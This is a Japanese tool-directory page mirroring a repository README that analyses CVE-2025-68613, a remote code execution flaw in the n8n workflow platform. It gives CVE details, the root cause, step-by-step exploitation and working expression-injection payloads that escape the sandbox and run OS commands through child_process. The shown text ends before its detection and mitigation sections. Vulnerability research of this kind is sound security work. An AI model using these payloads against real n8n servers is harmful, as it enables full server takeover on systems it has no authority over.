Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-68613-n8n-rce-analysis — CVE-2025-68613 (n8n) 重大なRCE分析 + 防御推奨事項(パッチ検証、検出アイデア、強化のヒント) | Kitploit
ツール/GitHubGitHub/ak-cybe/cve-2025-68613-n8n-rce-analysis
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育インシデントレスポンス
GitHubak-cybe/cve-2025-68613-n8n-rce-analysis

CVE-2025-68613-n8n-rce-analysis

CVE-2025-68613 (n8n) 重大なRCE分析 + 防御推奨事項(パッチ検証、検出アイデア、強化のヒント)

リポジトリを見る
1129ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ヘッダーバナー

タイピングSVG

深刻度 CVSS インスタンス数 ステータス CWE

ハッカーGIF マトリックスGIF


区切り

📑 目次

  • 🎯 エグゼクティブサマリー
  • 🐛 脆弱性の詳細
  • 🔬 技術分析
  • 💀 悪用手順
  • 💥 影響評価
  • 🔍 検出と対応
  • 🛡️ 緩和策
  • 📚 参考文献

🎯 エグゼクティブサマリー

アラートGIF

CVE-2025-68613 は、n8n のワークフロー自動化プラットフォームにおける 重大なリモートコード実行(RCE)脆弱性 であり、認証済みの攻撃者が 式インジェクション を通じて任意のシステムコマンドを実行できるようにします。

⚡ クイックスタッツ

🔥 指標📊 値
CVSS スコア9.9 / 10
露出インスタンス数103,476+
攻撃の複雑さ低
認証要件あり(低権限)
ユーザー操作不要

🎯 重要事項

📌 プロパティ📝 値
公開日2025年12月18日
ベクトルネットワーク (AV:N)
スコープ変更あり
影響CIA = 高
エクスプロイトタイプ式インジェクション

🐛 脆弱性の詳細

バグGIF

📋 CVE 概要

プロパティ値
🆔 CVE IDCVE-2025-68613
📊 CVSS スコア9.9(重大)🔴
🔗 CVSS ベクトルCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
🏷️ CWECWE-913(動的に管理されるコードリソースの不適切な制御)
📦 影響を受けるバージョン0.211.0 → 1.120.3, 1.121.0
✅ 修正バージョン1.120.4, 1.121.1, 1.122.0+

🤖 n8n とは?

n8n はオープンソースのワークフロー自動化プラットフォームで、400 以上のアプリケーションとの ノーコード/ローコード統合 を可能にします。以下のような環境で広く展開されています:

🏢 ユースケース📝 説明
🔧 DevOps自動化パイプライン、CI/CD 統合
🛡️ セキュリティ運用SOAR ワークフロー、インシデント対応
💼 ビジネスプロセス自動化、データワークフロー
📊 データETL プロセス、API 統合

🔧 技術的根本原因

🔓 脆弱性チェーン:
┌─────────────────────────────────────────────────────────────────┐
│  📝 n8n 式言語 → 動的データ処理                                 │
│                           ↓                                     │
│  ⚠️  サンドボックス分離の不十分なサーバーサイド評価              │
│                           ↓                                     │
│  💀 悪意のある式がサンドボックスを脱出                          │
│                           ↓                                     │
│  🖥️  Node.js child_process モジュールにアクセス                 │
│                           ↓                                     │
│  💥 完全な RCE - OS コマンド実行                                │
└─────────────────────────────────────────────────────────────────┘

🔬 技術分析

分析GIF

🎯 攻撃面

悪用の前提条件:

#📋 要件📝 詳細
1️⃣認証有効な n8n ユーザーアカウント(低権限で十分)
2️⃣権限ワークフローの作成/編集機能
3️⃣ネットワークアクセスn8n インスタンスに到達可能であること

⚔️ 攻撃の特徴

🏷️ 属性📊 値🔥 リスク
複雑さ低 (AC:L)🔴 高
ユーザー操作不要🔴 高
スコープ変更あり🔴 重大

🗺️ 脆弱性フロー図

graph TD
    A[🔐 認証ユーザー] -->|作成| B[📝 新規ワークフロー]
    B -->|注入| C[💀 悪意のある式]
    C -->|トリガー| D[⚡ 式評価]
    D -->|悪用| E[🔓 サンドボックス脱出]
    E -->|アクセス| F[🖥️ Node.js ランタイム]
    F -->|実行| G[💥 child_process によるOSコマンド]
    G -->|達成| H[☠️ サーバー完全乗っ取り]
    
    style A fill:#4CAF50,color:#fff
    style C fill:#ff9800,color:#fff
    style E fill:#f44336,color:#fff
    style H fill:#9c27b0,color:#fff

💀 悪用手順

ハッキングGIF

⚠️ 免責事項:以下は 教育目的のみ です。不正な悪用は違法です。

📸 段階的な悪用スクリーンショット

🖥️ ステップ 1:n8n インスタンスへのアクセス

脆弱な n8n ワークフロー自動化プラットフォームへの初期アクセス。

n8n ウェルカム画面
🔓 n8n ウェルカムダッシュボード - エントリポイント


➕ ステップ 2:新規ワークフローの作成

悪意のあるペイロードを含む新しいワークフローを作成します。

新規ワークフロー作成
📝 「最初のステップを追加」で新規ワークフローを作成


⚡ ステップ 3:マニュアルトリガーの追加

ワークフロートリガーを設定 - マニュアルトリガーはオンデマンド実行を可能にします。

マニュアルトリガー設定
🎯 ワークフロー起動のためのマニュアルトリガーを選択


📦 ステップ 4:Set ノードの追加

悪意のある式を含む「項目を編集(Set)」ノードを追加します。

Set ノード選択
🔧 ペイロード注入用の「項目を編集(Set)」ノードを追加


💉 ステップ 5:RCE ペイロードの注入

重要なステップ - サンドボックス脱出式を注入して RCE を達成します。

RCE ペイロード実行
💀 悪意のある式が 'id' コマンドを正常に実行!

// 🔴 悪意のあるペイロード(不正利用厳禁)
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

出力結果: uid=1000(node) gid=1000(node) groups=1000(node) ✅ RCE 確認!


💉 ペイロード例

コードインジェクションGIF

⚠️ 警告:これらのペイロードは 認可されたセキュリティテストのみ を目的としています。不正利用は違法です!

🔹 ID コマンド(ユーザー情報)

{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

🔹 PWD コマンド(現在のディレクトリ)

{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
ツールをダウンロード